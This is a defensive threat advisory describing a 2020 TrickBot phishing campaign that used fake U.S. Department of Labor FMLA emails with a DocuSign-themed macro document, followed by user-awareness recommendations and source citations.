TrickBot Exploited DocuSign Theme
I. Targeted Industries
- General Businesses
- Government Agencies
- Financial Institutions
- General Public
- Higher Education
- Healthcare Services
Threat actors have begun to leverage the U.S. Department of Labor’s Family and Medical Leave Act (FMLA) to spread a TrickBot Trojan amidst COVID-19 fears. TrickBot is a well-known and sophisticated banking Trojan that was developed in 2016 and has continuously evolved to evade detection. TrickBot is now being used as part of a new phishing campaign that aims to spread malware via DocuSign attachments that appear to come from the U.S. Department of Labor. These emails contain logo replicas, images, and verbiage from the Labor Department website. Malicious document files are one of the most popular ways cybercriminals distribute malware.
III. Background Information
The phishing campaign emails contain three files: us-logo.png, faq.png, and Family and Medical Leave of Act 22.04.doc. The two .png images are from the Labor Department and seen in the HTML email. The DocuSign replica is the malicious file containing TrickBot. The document will ask the user to enable macros to run malicious scripts. The macro begins by creating a local directory (C:/Test) and dropping a batch file called terop.bat. These scripts then call a command and control server that works on installing Trickbot. This terop.bat file downloads a PE file and executes it. cURL is used to download various files from the CnC server but due to cURL not being available by default in windows machines it fails. While the download fails, the IoC indicates that this is a verified Trickbot campaign.
- User Awareness Training
Avoid suspicious emails, links, websites, attachments, etc. Users should be educated about new types of attacks and schemes to mitigate risk. Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
- Phishing Awareness Training
Users would be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past.
- Use Legitimate Sources
Make sure the items are coming from a legitimate source and review for grammar errors as indicators of illegitimate sources.
- Verify Authenticity Before Downloading Anything
Avoid downloading anything from unknown sources and always verify the authenticity of the download.
- Recommended Link: https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams
V. Indicators of Compromise (IoCs)
- System files
The link below has been included to assist with the download of some identified IoC’s related to this Threat Advisory Report. Be on the lookout for these IoC’s, as well as anything that looks similar.
(1) Vila, Ashkan, David Bryant, and Limor Kessem. “TrickBot Campaigns Targeting Users via Department of Labor FMLA Spam.” Security Intelligence, April 30, 2020. https://securityintelligence.com/posts/trickbot-campaigns-targeting-users-via-department-of-labor-fmla-spam/.
(2) Montalbano, Elizabeth, and Elizabeth Montalbano. “TrickBot Attack Exploits COVID-19 Fears with DocuSign-Themed Ploy.” Threatpost English Global threatpostcom. Accessed May 6, 2020. https://threatpost.com/trickbot-attack-covid-19docusign-themed-malw/155391/
(3) Stahie, Silviu. “New Trickbot Campaign Uses Fake Emails from U.S. Department of Labor.” Security Boulevard, May 5, 2020. https://securityboulevard.com/2020/05/new-trickbot-campaign-uses-fake-emails-from-u-s-department-of-labor/
(4) Stahie, Silviu. “New Trickbot Campaign Uses Fake Emails from U.S. Department of Labor.” Security Boulevard, May 5, 2020. https://securityboulevard.com/2020/05/new-trickbot-campaign-uses-fake-emails-from-u-s-department-of-labor/